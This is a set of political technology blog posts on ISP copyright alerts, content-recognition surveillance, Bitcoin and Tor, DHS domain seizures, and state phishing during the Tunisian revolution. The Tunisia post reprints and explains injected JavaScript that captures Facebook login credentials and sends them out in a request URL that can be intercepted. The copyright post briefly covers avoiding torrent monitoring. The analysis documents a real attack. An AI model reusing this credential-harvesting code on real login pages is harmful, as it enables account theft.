The Copyright Alert System Now Being Rolled Out at Major ISPs

In the next two months, AT&T, Time Warner, Verizon and Comcast will implement the The Copyright Alert System program developed by The Center for Copyright Information. Of course, The Center for Copyright Information is a RIAA and MPPA front. The monitoring system that will be used will rely on the MarkMonitor service that has been in place for a numbers of years now. The “monitors” will be The Center for Copyright Information, i.e., RIAA and MPAA. Once again, these entities have been monitoring bitTorrent traffic for years. Indeed, a recently presented Security Research Paper concludes that you can expect to be tracked within 3 hours of firing up a torrent client.

The primary change is that in lieu of direct legal action(which can be frictional), the RIAA/MPAA, using the aforementioned ISPs as agents, can now engage in a relatively frictionless enforcement operation. And this is where the data analytics begin to kick in. Large-scale users will still be subject to the same modis operandi legal action but the voluminous data that has been collected over the years by the likes of MarkMonitor will now be used as a queryable data repository against which the new data will be used–according to whatever algorithm employed–to trigger the Copyright Alert Notifications to end users via that user’s ISP(serving an agency role of a Sheriff, more or less).

Evasion tactics? Well forget about things like Tor. Tor works over the tcp protocol(and can’t handle the load of p2p file sharing to begin with). bitTorrent these days works over udp. Sophisticated encryption techniques like mse/pe to me are more about thwarting ISP throttling, but in this case it is not the ISPs who are the monitoring agent. The best evasion technique is to use a udp proxy. But I imagine that a reliable service with tolerable speed is going to cost money which begs the question a bit of why not simply spend the money on a paid download music service. That was basically my decision around 6 years ago when the opportunity costs of evasion(when the monitoring really began to pick up) well exceeded the monthly subscription cost of a paid service.

Of course, the Copyright Alert System is just harbinger of things to come. These types of arrangements up and down the IT stack will increase by orders of magnitude under the formal adoption of whatever “cybersecurity act” that eventually passes(once again, because the basic top-level rules will be enacted via fiat, i.e, executive decision, the subsequent proposal and adoption of a legislative act is an absolute certainty). And this, of course, just exposes the silliness of the “network neutrality debate” because “network traffic” should always be understood to mean “authorized network traffic.” The arbitration between “authorized” and “unauthorized” traffic will be subject to the most relentless data analytics imaginable.

I will also offer a brief comment on unjustified triumphalism that thinks these issues can be magically skirted around. This belief is based on a fundamental mischaracterization of the internet as a horizontal, decentralized type of network. But it is not that. Rather, the internet is a type of scale-free, small network that follows a power law distribution. The network properties of scale-free invariance is much a product of quite a bit of centralized coordination. Simply, it is a mistake to think that technology alone can overcome the problem of political economy. Instead a necessary condition to be able to “route around the damage” is jurisdictional differentiation in political economy. I’ve been harping this point for a couple of years in my posts about Wikileaks. If the jurisdictional differentiation melts away then feel free to proceed straight to the outright pessimism of Evgeny Morozov and Richard Stallman who have given up on the anarchic promise of the internet. The alternative is a platform that turns out to be very well suited for tight control by Corporation and State. The evidence for this latter pessimism is the degree of rent-seeking in data analytics this little platform of ours affords(which makes the actions of State agency very much “rational” and hardly stupid in this space). The game is up when the cyber-security and “data czars” come rolling down the pike.

Finally, The Copyright Alert System is once again immediate evidence of a “Commercialist” anomaly with regard to political economic agency. Methodological individualism is hard pressed to explain ISPs acting as a Sheriff Agency (on behalf of the RIAA/MPAA) against their own customers. The model of The Firm, however, explains it quite well.

Technology is not Freedom

“Copyright bots” are a new “innovation” in data-analytics. The reliability of the data recognition(the content signature) by these distributed platforms, however, is still quite faulty. Wired recently published some of the embarrassing false positives generating by these platform censors which resulted in termination outages on high-profile content providers. Content that has recently been blocked included Michelle Obama’s speech on Youtube, NASA’s broadcast of the Curiosity Rover on Youtube and the Hugo Awards on UStream.

The more interesting point of the story was buried a bit: all major content platform providers are embedding these spy platforms into their infrastructure. This is not an actual legal requirement but it is following a law of political economy.

I browsed over to the website of one of the major players in this field. The tagline of the website reads: “Powering the Internet Video Economy.” The home page splash presentation trumpets the company’s partnership with Hollywood, Professional Sports, and China. I looked at its application platform, a platform, of course that’s patent pending(patenting the enforcement of patents and copyrights). The jargon reads “Rights Management, Content Filtering and Monetization, Business Analytics, Automatic Content Recognition, Search Recommendations.” In plain terms this means they are spying on you to both restrict access to unauthorized access to content and to monetize your viewing habits for “authorized content.” Frankly, why wouldn’t a censoring platform with access to your viewing habits take advantage of it to monetize your preferences to “legitimate” content providers. Its called Capitalism, right?

Content Identification and Data Signature Analysis is an “industry” in its infancy. There is plenty of innovation to be had in the pursuit of economic rents in this sector of political economy. But I would cite as an easy example of how technological innovation is not necessarily going to improve your life and make you more free. In fact, as in this case, its likely to make you substantially less free. This was a point I tried to make in my recent two-part “Internet Freedom” posts. And as I noted, the business of data analytics was at the heart of Peter Thiel’s recent critique of Google CEO Eric Schmidt.

Fine, you say. Just don’t watch your content online. No one is forcing you to log on to Google to watch content. But it won’t end there. Currently, all major online content providers are busy integrating content spyware into their infrastructure and platforms. But the same law of political economy driving this will steer a “spy regulatory platform” to the network provider layer, too.

Although it is not a major news or blogosphere focus, the “cybersecurity” executive order publicly contemplated by Barack Obama is quietly moving through The Firm’s channels for executive implementation. A legislative reinforcement will follow eventually. The law of political economy–rent-seeking– predicts the legislative addendum/follow-up to a CEO decree because of competing players(rent-seeking agency) fighting over the specific compliance (rules) regime of the contest.

The broad structure of the contest is defined by the top-level rule:

immunity from liability with respect to network traffic in exchange for compliance

Obama’s CEO Executive Decree will “legally” establish the broad stroke of the top level rule. Namely:

(i) the rule that network providers are, Ab initio, liable for the content payload of traffic over their network infrastructure(more specifically, liable for not filtering/blocking/counteracting “illegal/bad” traffic)

(ii) ex tempore immunity from all liability by following/implementing the rules of the compliance regime

The political economic competition in any “CyberSecurity Act” will be over the compliance rules for ex tempore immunity. Of course, any such “Bill” will be presented as ostensibly resolving the regulatory and legal burdens of network providers interfacing/info sharing with the extensive federal agency framework regarding “cyber attacks.” Every critical piece of infrastructure is plugged into the “public network” so we need a uniform, efficient regulatory framework to deal with the realities of the 21st century. It will even be presented with a “libertarian spin,” a pro-business slant, “reducing the regulatory burdens” on business.

Of course, the current reality of the 21st century is that the primary government agency responsible for coordinating cyber attacks is the United States government. The only agency actually capable of crippling the public network is the United States government.

The other pertinent reality of the 21st century is the inevitability of cloud computing. By “cloud computing,” I mean every computer resource imaginable delivered as a service. These resources include software, storage, platform, infrastructure, security and data. All tied together by a stack of interoperable APIs. It is in this environment where the contest over data analytics will play out. And you really can’t defect from this. More precisely, I would equate any attempt at defection as a “retreat to the woods.” Sans going “Jeremiah Johnson,” you will not be able to escape the data analytics of the cloud.

The ubiquity of cloud computing is inevitable because the internet is a small network. The cloud is much more efficient. A “free market” over a small network almost certainly delivers a cloud computing platform. Simply because that’s where the economic rents are. However, the data-analytics regime over the cloud is going to follow the structure of the rent-seeking contest. According to contest structure I outlined above, the contest will follow a rent-seeking compliance of the panopticon.

Obey the panopticon or starve. That’s not freedom…

Chuck Schumer’s New War on Bitcoin

New York Senator Chuck Schumer probably occupies a top place in the libertarian axis of evil. A bigot, a religious fanatic, a nanny-state totalitarian and a crook, Schumer epitomizes the libertarian critique against political authority. This is a man who is accustomed to barking orders at a servile populace, a man who counts intimidation and threats to be among his preferred methods of executing governance. So this video and story of Schumer’s outrage over Silk Road and Bitcoin, likely facilitated by a recent Gawker article, is vintage Chuck. Conjure moral outrage, summon the TV cameras, bark orders…

But, unfortunately for Chuck, this ain’t Four Loco. Ordering the Feds to shutdown the website and “seize the domain” was comedic display of Mussolini buffoonery. I suppose it’s sad that no one in the press corp had the technical wherewithal to challenge Schumer’s stupidity, but it’s amusing that Schumer’s aide, the one that set up the TOR client to access the site, didn’t have the cojones to prevent Chuck from looking like a moron. But then again, I suppose it’s probably career suicide to stand between Schumer’s moral outrage and a TV camera.

Silk Road is running as a TOR hidden service on the TOR P2P tunneling network. This means it’s being run from someone’s anonymous box that generally can’t be identified. It can be anywhere in the world. Anyone who downloads the TOR software can setup a hidden service. There’s no “domain name” to seize here and the only way to stop this sort of thing (at least until the “Internet Kill Switch Bill” is enacted) is to ban the TOR protocol outright, which would counter the government’s interests because: (i) it would cast the US in a bad authoritarian light (ii) more importantly, it’s used by US intelligence organs as a secure communications tunneling network with international assets. After all, it was the US government that originally developed it, and it was released into the wild because it’s useless, like any other P2P network, without a robust number of nodes. In particular, here, a TOR network of nodes consisting of just the spies, informants and US bureaucrats would be “stick out like a sore thumb” tunnel; these tunnels need lots of “noise,” that is, lots and lots of other tunnels to be effective. Also, of course, if the software was “classified,” there would be an obvious distribution problem of getting the software into the hands of the intelligence assets, a vulnerability(which could be exploited, because the acquisition method of the software could be compromised and tracked) that, combined with the “stick out like a sore thumb” intelligence-only tunnels, would make TOR useless. And this is why the US government released TOR into the wild.

Chuck hasn’t gotten the memo on TOR yet, but I imagine he will get the intelligence organ “sit down” on that. It’s not TOR that’s the threat, it’s Bitcoin. Schumer called Bitcoin a “money laundering mechanism;” certainly he is ready to take the lead in Senate hearings to foster drafting new legislation that would outlaw any unauthorized crypto-currency. However, the government, particularly the intelligence organs, is a bit ahead of Schumer in that the CIA is sponsoring a presentation by the Bitcoin lead developer.

Hitherto, the problem of crypto-currencies, in terms of being any threat to the State, was the need of a central authority to regulate against fraud. Anyone can define an electronic coin as a ledger/chain of digital signatures. One obvious problem is how to prevent Agent A, who is wishing to transfer ownership of the coin for a good/service, to simultaneously use the same coin to buy something from Agent B and Agent C, that is, more or less simultaneously digitally sign over the coin to Agent B and Agent C. This problem would seem to require a central authority to referee between A’s transaction with B and A’s transaction with C.

The Bitcoin algorithm, from I gather reading the technical whitepaper, solves the problem of transaction verification by incentivizing every node in the Bitcoin network to race for verification of outstanding transactions. In other words, every node is in competition to serve as the clearinghouse for the current existing block of unverified transactions. The verification is done by timestamp. All transactions are broadcast to all nodes, but in a P2P network, Node X’s timestamp for the current unverified transactions may be differ than Node Y’s timestamp for the same. The timestamp verification that wins out, that is the node that wins the clearinghouse game, depends on that node solving a “proof of work concept” that is able to solve a difficult mathematical problem of converting a hash representation of it’s own block into a required leading zero-bit format. The winning node then broadcasts it’s time stamp block to all nodes that readjust accordingly. The winning node is awarded a certain amount of bitcoins which serves as the first transaction in the next block of unverified transactions that will need to be verified.

Bitcoin is able to use competition to resolve the clearinghouse problem(clearinghouse nodes are incentivized by new coin creation). It ingeniously self-corrects for the introduction of cpu power by making the mathematical work of proof problem geometrically more difficult. This allows scalability without monopoly capture, but it does create a division of labor scenario where clearinghouse nodes invest in GPU cycles over CPU cycles(the investment in GPU cycles allows the system to handle the clearinghouse needs of an expanding system). However, the system constraints cap the total coin creation which means that clearinghouse nodes will eventually only compete over transaction fees.

The question concerning Bitcoin is two-fold: (i) can it survive a coordinated hacker attack (ii) can it survive government censorship/banning. We are probably about to find out about (ii). The thing about the US is that it is not a hard censorship regime; it’s a soft censorship regime. An actual honest-to-god crypto currency, however, is it’s worst nightmare. The US government will release something like TOR into the wild, but it would never release something like Bitcoin into the wild.

Social Network Platforms and Subversive Politics

Jesse Walker at Reason expresses skepticism concerning the branding of the Tunisian Revolution as a WikiLeaks Revolution.

I noted yesterday that some pundits have been calling the Tunisian revolt a “WikiLeaks revolution.” The phrase “Twitter revolution,” last spotted wandering around Tehran in a daze, has made a comeback as well. So now we’re in for a big boring debate about whether these boosterish labels fit, an argument that threatens to overshadow some much more interesting questions. The Internet is a series of tools. Some of those tools were used in Tunisia. I’d love to see some detailed investigations of how they were used, how they affected the use of older tools and tactics, how they advanced and/or held back the struggle, and how the regime responded to them. Debating whether their presence makes this a “[fill-in-the-blank] revolution,” by contrast, seems pointless.

Yesterday, I engaged in some bit of punditry that used the term “WikiLeaks Revolution.” Regarding Tunisian politics, I readily concede that I am an armchair blogger. However, I was careful to base my statements on journalists who could give an eyewitness account. In the post, I referenced an article in Foreign Policy Journal by Yvonne Ridley.

The demise of Ben Ali came when police prevented an unemployed 26-year-old graduate from selling fruit without a license. Mohammad Bouazizi turned himself in to a human torch on December 17 and died of the horrific burns in Sidi Bouzid, in central Tunisia.

It was the final straw, a defining moment which ignited rallies, marches and demonstrations across Tunisia.

And revelations from Wikileaks cables exposing the corrupt and extravagant lifestyle of Ben Ali and his grasping wife fanned the flames of unbridled anger from a people who were also in the grip of poverty.

I knew it was coming. I saw the burning desire for freedom in the eyes of the courageous people of Ghafsa when the Viva Palestina Convoy entered the country in February 2009 on its way to Gaza.

Our convoy witnessed the menacing secret police intimidate the crowds to stop them from gathering to cheer us on.

This vast army of spies, thugs and enforcers even tried to stop us from praying in a local mosque.

That they stood their ground to cheer us on prompted me to leave my vehicle and hug all the women who had turned out. We exchanged cards and small gifts and then, to my horror, I discovered 24 hours later that every woman I had embraced in the streets of Gafsa had been taken away and questioned.

The broader context that brewed the revolution was a police state apparatus protecting a corrupt political economy. The trigger was an act of self-immolation by an unemployed recent university graduate who was robbed of his only means of supporting himself. The WikiLeaks cables were a catalyst.

Now on matters of internet technology I’m not so much of an armchair blogger. I can do my own investigative reporting. Now I do have quite bit of skepticism regarding the intersection of technology and subversion politics. A lot of hype. There is even more hype regarding “social networking” and subversion politics. Things like “Twitter Revolution.”

The first thing to point is to be careful about conflating WikiLeaks with social networking platforms. WikiLeaks is document-sourced journalism. The “Social Networking Platform” actually failed as a means of document-sourced investigative reporting. I’ve pointed this out several times before, and I’m only pointing out what Assange himself has emphasized on several occasions. So, immediately there is a limitation to the Social Networking Platform when it comes to subversion politics. WikiLeaks relies on traditional media institutions both to provide editorial context and to serve as a distribution source.

Now the Tunisian government, however, most certainly viewed the Social Networking Platform as a threat. Here’s a post from last July by technically knowledgeable Tunisian citizen documenting how the Government was collecting social networking platform credentials of it’s citizens. At the time, this would be appear to have been some type of an official DNS cache poisoning/Phishing attack. The Tunisian Internet Agency(ATI) is the upstream provider for all Tunisian ISPs. Certainly, then, from a technical standpoint, it would have been feasible. However, the blogger notes that the attacks occurred only intermittently so as to not arouse too much suspicion.

With the latest revolt, the Tunisian government, via the ATI, resorted to more sophisticated methods of “Phishing.” From Aljazeera, Tunisia’s bitter cyberwar, we learn that ATI was injecting javascript code into Social Networking Platform login pages that intercepted the user login and used AJAX “Get” requests to send user credentials in clear text over the wire. I investigated this, and at least with respect to Facebook, I could see how this attack could work.

The hackivist “Anonymous” posted the HTML source for the Facebook login here. Below is the “phishing code” that was apparently being injected by ATI.

function h6h(st){var st2="";for(i=0;i>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}

In the “form tag” of the html, an onsubmit client event, “onsubmit=’hAAAQ3d()’,” was also being injected that would trigger the phishing code. It’s fairly simple in operation. A user login would also trigger a client onsubmit event handler, which is the function “hAAAQ3d().” This function uses the Document DOM model to capture the username and password. It then passes each to a function “h6h” that uses string manipulation for a very weak encryption. It then builds a “url string” with the weakly encrypted username and password in the querystring. It then uses the XMLHttpRequest object(or the MS ActiveXObject version in the event of Internet Explorer) to pass this url in a client-side , synchronous AJAX Get Request. The actual url, of course, on the Facebook side(for browser cross-domain security reasons, the domain in the url must be facebook.com) doesn’t exist. The intent is to pass the url, the url with the username and password in the querystring, in clear text over the wire that can then be captured by ATI.

“Anonymous” posted a GreaseMonkey script for FireFox that stripped the “phishing script” from Social networking platform login pages. EFF issued a Security Bulletin on Jan. 11th that highlighted the “phishing attempts.” From all accounts, the “phishing attempts,” or at least attempts by this particular method, had ceased by Jan. 11th or Jan. 12th.

Hactivist “Anonymous” also participated in DDoS attacks against Tunisian government websites that were successful. But as I have noted in previous “WikiLeaks Watch” posts, Anonymous/AnonOps uses IRC(Internet Relay Chat) to organize participants in this endeavor. And IRC has been around forever.

For all you Gen Y types out there; IRC and UseNet was to Gen X as the Social Network Platform is to Gen Y. The difference between the two “platforms” is that the SNP has a better API, with regard to web and particularly with regard to today’s ubiquitous mobile devices. It’s an evolution. But a revolution? That’s debatable.

The lesson from regarding SNP and the Tunisian government is that SNP can be quite resilient against “technical attacks.” It’s importance in the Tunisian revolution was magnified because it was attacked by the Tunisian government. That was a mistake. But the Ben Ali regime is not the US Government. The US Government can ex post facto condemn the crude “censorship” of the Ben Ali regime while working methodically behind the scenes to capture the political economy of SNP. We have already seen this with respect to WikiLeaks and the financial banking system. Cutting off means of financial support is a far more subtle and far more powerful means of censorship.

“Anonymous” is a hero when it attacks the crude, technical censorship of the Ben Ali regime. But it’s criminal when it attacks the political economy of US censorship.

As I maintain, and will continue to maintain, a political hack must be at the heart of undermining the statist 21st century political economy. Technical utopianism isn’t going to cut it alone. For example, Peter Thiel’s supposed libertarian e-money transaction system(PayPal) ended up being politically captured and now is a powerful component of SNP soft censorship.

SNP that can reinforce a political hack(s) has the potential to be revolutionary. But without the political hacks, it is only evolutionary, and the evolutionary path would be more along the lines of human social fitness for the Orwellian Boot. To the extent that SNP does threaten to become revolutionary, you can bet the mainstream babble about “Twitter Revolution” will change in tone.

Update on DHS/ICE Domain Seizures

My post,The Background Dope on DHS Recent Seizure of Domains, that I published last Saturday evening generated a significant traffic spike to my blog. I had a ton of referrers coming from facebook,twitter, tech forums and a quite a few originating from tech publications. A Techdirt.com article,Homeland Security’s Domain Name Seizure May Stretch The Law Past The Breaking Point, used my post as the technical analysis of the mechanics of the “domain seizures” and then referenced this article, Domain Name Seizures and the Limits of Civil Forfeiture, by Larry Downes to examine the legality of these domain name seizures or forfeitures.

Since my original post, we have learned that these seizures were part of the “Operation In Our Sites” initiative. Indeed, this was dubbed by the DOJ as “Operation In Our Sites 2.” It should be recalled, the first phase involved the raiding of and shutting down of 9 “pirate movie sites.” These were site shutdowns, raids, executed search warrants, bank account seizures; the domain registrant information was transferred over to ownership by DHS. In phase two, none of this is going on; nothing is being seized, no one is being raided. No one is being notified of anything or presented with any warrant. You simply have a private company acting as contractual agent of the DHS modifying the .com TLD Zone Files in cooperation with VeriSign, which is the agency that has the ICANN contractual delegated authority to manage the .com TLD.

Larry Downes is discussing the issue of “pre-trial” confiscation. I’m not lawyer but I would posit here, in “Phase II,” the issue is “pre-legal” confiscation. There is no principle of law being followed here. It’s just simple manipulation of the domain name system. Everyone knows that ICANN is subject to the laws of the US. But now, perhaps it might now be dawning on people that this means today that it is more and more becoming subject to the Authority of DHS. And simply re-constituting ICANN outside of US jurisdiction is pointless. If you are paying attention to the latest rounds of disclosures from Wikileaks, it should be obvious that the informal US jurisdictional reach is is pretty ubiquitous.

To those techno-optimists out there who think p2p is the automatic answer to counter this type of thing, I question their understanding of network theory. Any scale-free network is characterized by hubs, those nodes that are highly connected. Any p2p solution that would have a hope of bypassing or supplanting the current DNS would have to evolve a type of synchronized connection hierarchy that would be vulnerable to Statist reprisal. The issue is not a technical one. It is a political one.